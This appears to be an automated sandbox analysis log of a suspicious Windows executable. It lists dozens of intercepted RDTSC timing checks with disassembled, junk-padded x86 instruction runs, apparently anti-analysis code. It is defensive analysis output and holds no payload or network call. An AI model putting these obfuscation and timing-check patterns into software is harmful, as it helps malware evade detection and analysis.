Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60A91 second address: 4D60B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007FF4C050159Bh 0x0000000c or ax, 177Eh 0x00000011 jmp 00007FF4C05015A9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a js 00007FF5305A0194h 0x00000020 pushad 0x00000021 mov di, si 0x00000024 call 00007FF4C05015A8h 0x00000029 pushfd 0x0000002a jmp 00007FF4C05015A2h 0x0000002f jmp 00007FF4C05015A5h 0x00000034 popfd 0x00000035 pop eax 0x00000036 popad 0x00000037 mov eax, dword ptr [ebp-0Ch] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF4C05015A8h 0x00000043 sub eax, 2F02BE68h 0x00000049 jmp 00007FF4C050159Bh 0x0000004e popfd 0x0000004f jmp 00007FF4C05015A8h 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60B5C second address: 4D60B92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FF4C0C3E176h 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov cx, bx 0x0000001a mov di, EF6Ch 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60B92 second address: 4D60B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60B98 second address: 4D60B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60B9C second address: 4D60BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60BA0 second address: 4D60C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FF4C0C3E178h 0x0000000f nop 0x00000010 jmp 00007FF4C0C3E170h 0x00000015 push eax 0x00000016 pushad 0x00000017 jmp 00007FF4C0C3E171h 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FF4C0C3E16Eh 0x00000023 jmp 00007FF4C0C3E175h 0x00000028 popfd 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c popad 0x0000002d nop 0x0000002e jmp 00007FF4C0C3E16Ah 0x00000033 lea eax, dword ptr [ebp-08h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movsx ebx, si 0x0000003c jmp 00007FF4C0C3E176h 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60C9C second address: 4D60CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4CA5E628h 0x00000008 mov eax, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 mov dh, 52h 0x00000012 push eax 0x00000013 jmp 00007FF4C05015A1h 0x00000018 pop ecx 0x00000019 popad 0x0000001a test edi, edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FF4C05015A3h 0x00000025 or ax, B4CEh 0x0000002a jmp 00007FF4C05015A9h 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60CFA second address: 4D60D75 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov si, 2CA9h 0x0000000b pushfd 0x0000000c jmp 00007FF4C0C3E176h 0x00000011 adc si, 5878h 0x00000016 jmp 00007FF4C0C3E16Bh 0x0000001b popfd 0x0000001c popad 0x0000001d popad 0x0000001e js 00007FF530CDCAF0h 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FF4C0C3E174h 0x0000002b or esi, 113B72D8h 0x00000031 jmp 00007FF4C0C3E16Bh 0x00000036 popfd 0x00000037 mov bx, si 0x0000003a popad 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e pushad 0x0000003f mov si, B787h 0x00000043 mov al, 45h 0x00000045 popad 0x00000046 mov dword ptr [esi+08h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60D75 second address: 4D60D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60D79 second address: 4D60D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60D7F second address: 4D60E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007FF4C05015A6h 0x00000011 push 00000001h 0x00000013 jmp 00007FF4C05015A0h 0x00000018 nop 0x00000019 jmp 00007FF4C05015A0h 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx ebx, ax 0x00000023 mov esi, 783B6C79h 0x00000028 popad 0x00000029 nop 0x0000002a pushad 0x0000002b mov di, si 0x0000002e pushfd 0x0000002f jmp 00007FF4C050159Eh 0x00000034 xor cx, EB88h 0x00000039 jmp 00007FF4C050159Bh 0x0000003e popfd 0x0000003f popad 0x00000040 lea eax, dword ptr [ebp-18h] 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FF4C05015A4h 0x0000004a add ch, FFFFFFE8h 0x0000004d jmp 00007FF4C050159Bh 0x00000052 popfd 0x00000053 call 00007FF4C05015A8h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60EAB second address: 4D60EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E174h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60EC3 second address: 4D60F00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d jmp 00007FF4C05015A6h 0x00000012 js 00007FF53059FD59h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF4C050159Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60F00 second address: 4D60F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60F04 second address: 4D60F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60F0A second address: 4D60F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 pushfd 0x00000006 jmp 00007FF4C0C3E179h 0x0000000b sub ecx, 67CB8C46h 0x00000011 jmp 00007FF4C0C3E171h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-14h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edi, 3DE80ACEh 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60F53 second address: 4D60FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF4C050159Ch 0x00000012 or al, 00000048h 0x00000015 jmp 00007FF4C050159Bh 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f mov dword ptr [esi+0Ch], eax 0x00000022 jmp 00007FF4C050159Bh 0x00000027 mov edx, 74E806ECh 0x0000002c jmp 00007FF4C05015A6h 0x00000031 sub eax, eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FF4C050159Ah 0x0000003c or ax, E808h 0x00000041 jmp 00007FF4C050159Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60FD6 second address: 4D60FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60FDC second address: 4D60FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D60FE0 second address: 4D61020 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c jmp 00007FF4C0C3E16Ah 0x00000011 pop edi 0x00000012 pushad 0x00000013 mov ax, 51BDh 0x00000017 pushfd 0x00000018 jmp 00007FF4C0C3E16Ah 0x0000001d sbb si, DD98h 0x00000022 jmp 00007FF4C0C3E16Bh 0x00000027 popfd 0x00000028 popad 0x00000029 test eax, eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61020 second address: 4D6109E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FF4C05015A2h 0x0000000f or ecx, 52AC5F28h 0x00000015 jmp 00007FF4C050159Bh 0x0000001a popfd 0x0000001b popad 0x0000001c jne 00007FF53059FC18h 0x00000022 jmp 00007FF4C05015A6h 0x00000027 mov edx, dword ptr [ebp+08h] 0x0000002a jmp 00007FF4C05015A0h 0x0000002f mov eax, dword ptr [esi] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 jmp 00007FF4C050159Dh 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6109E second address: 4D610A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D610A4 second address: 4D610A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D610A8 second address: 4D610AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D610AC second address: 4D610F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a jmp 00007FF4C05015A5h 0x0000000f mov eax, dword ptr [esi+04h] 0x00000012 jmp 00007FF4C050159Eh 0x00000017 mov dword ptr [edx+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF4C05015A7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D610F8 second address: 4D6112D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FF4C0C3E16Bh 0x0000000c jmp 00007FF4C0C3E173h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esi+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, di 0x0000001e mov dl, 21h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6112D second address: 4D61187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+08h], eax 0x0000000d jmp 00007FF4C050159Dh 0x00000012 mov eax, dword ptr [esi+0Ch] 0x00000015 jmp 00007FF4C050159Eh 0x0000001a mov dword ptr [edx+0Ch], eax 0x0000001d jmp 00007FF4C05015A0h 0x00000022 mov eax, dword ptr [esi+10h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF4C05015A7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61187 second address: 4D6118C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6118C second address: 4D6119E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6119E second address: 4D611A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611A2 second address: 4D611A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611A6 second address: 4D611AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611AC second address: 4D611D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF4C050159Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611D7 second address: 4D611DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611DD second address: 4D611E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D611E1 second address: 4D61200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C0C3E172h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61200 second address: 4D6123A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF4C05015A1h 0x00000009 and al, FFFFFFB6h 0x0000000c jmp 00007FF4C05015A1h 0x00000011 popfd 0x00000012 mov bx, si 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+18h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6123A second address: 4D6123F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6123F second address: 4D61260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, di 0x00000012 mov cx, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61260 second address: 4D61266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61266 second address: 4D61277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61277 second address: 4D6127B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6127B second address: 4D61281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61281 second address: 4D61298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4C0C3E173h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61298 second address: 4D612D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF4C050159Eh 0x00000013 pushfd 0x00000014 jmp 00007FF4C05015A2h 0x00000019 add cx, 0528h 0x0000001e jmp 00007FF4C050159Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D612D9 second address: 4D6133F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+20h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF4C0C3E179h 0x00000017 and ax, F3F6h 0x0000001c jmp 00007FF4C0C3E171h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FF4C0C3E170h 0x00000028 sbb ecx, 54D6CD18h 0x0000002e jmp 00007FF4C0C3E16Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6133F second address: 4D61345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61345 second address: 4D61349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61349 second address: 4D613A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007FF4C05015A7h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 jmp 00007FF4C05015A6h 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF4C05015A7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613A0 second address: 4D613A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613A6 second address: 4D613AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613AA second address: 4D613E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b jmp 00007FF4C0C3E177h 0x00000010 mov dword ptr [edx+28h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF4C0C3E175h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613E6 second address: 4D613EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613EC second address: 4D613F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D613F0 second address: 4D6140F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C05015A2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6140F second address: 4D61438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF4C0C3E175h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61438 second address: 4D61491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF4C05015A7h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FF4C05015A9h 0x0000000f or si, F056h 0x00000014 jmp 00007FF4C05015A1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ax, word ptr [esi+30h] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 movzx ecx, di 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61491 second address: 4D614D8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FF4C0C3E16Bh 0x0000000b pushfd 0x0000000c jmp 00007FF4C0C3E178h 0x00000011 add ch, FFFFFFD8h 0x00000014 jmp 00007FF4C0C3E16Bh 0x00000019 popfd 0x0000001a pop esi 0x0000001b popad 0x0000001c mov word ptr [edx+30h], ax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov di, cx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D614D8 second address: 4D614DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D614DD second address: 4D614E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D614E3 second address: 4D614E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D614E7 second address: 4D61560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FF4C0C3E16Ch 0x00000016 adc al, FFFFFF98h 0x00000019 jmp 00007FF4C0C3E16Bh 0x0000001e popfd 0x0000001f mov edi, eax 0x00000021 popad 0x00000022 mov word ptr [edx+32h], ax 0x00000026 jmp 00007FF4C0C3E172h 0x0000002b mov eax, dword ptr [esi+34h] 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007FF4C0C3E16Ch 0x00000037 or cx, AB28h 0x0000003c jmp 00007FF4C0C3E16Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61560 second address: 4D6159D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007FF4C05015A0h 0x00000011 test ecx, 00000700h 0x00000017 jmp 00007FF4C05015A0h 0x0000001c jne 00007FF53059F71Bh 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6159D second address: 4D615EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF4C0C3E178h 0x00000008 and ecx, 3E07F318h 0x0000000e jmp 00007FF4C0C3E16Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, dx 0x00000019 popad 0x0000001a or dword ptr [edx+38h], FFFFFFFFh 0x0000001e jmp 00007FF4C0C3E16Bh 0x00000023 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000027 pushad 0x00000028 mov ebx, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c mov dx, si 0x0000002f rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0E2B second address: 4DA0E2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
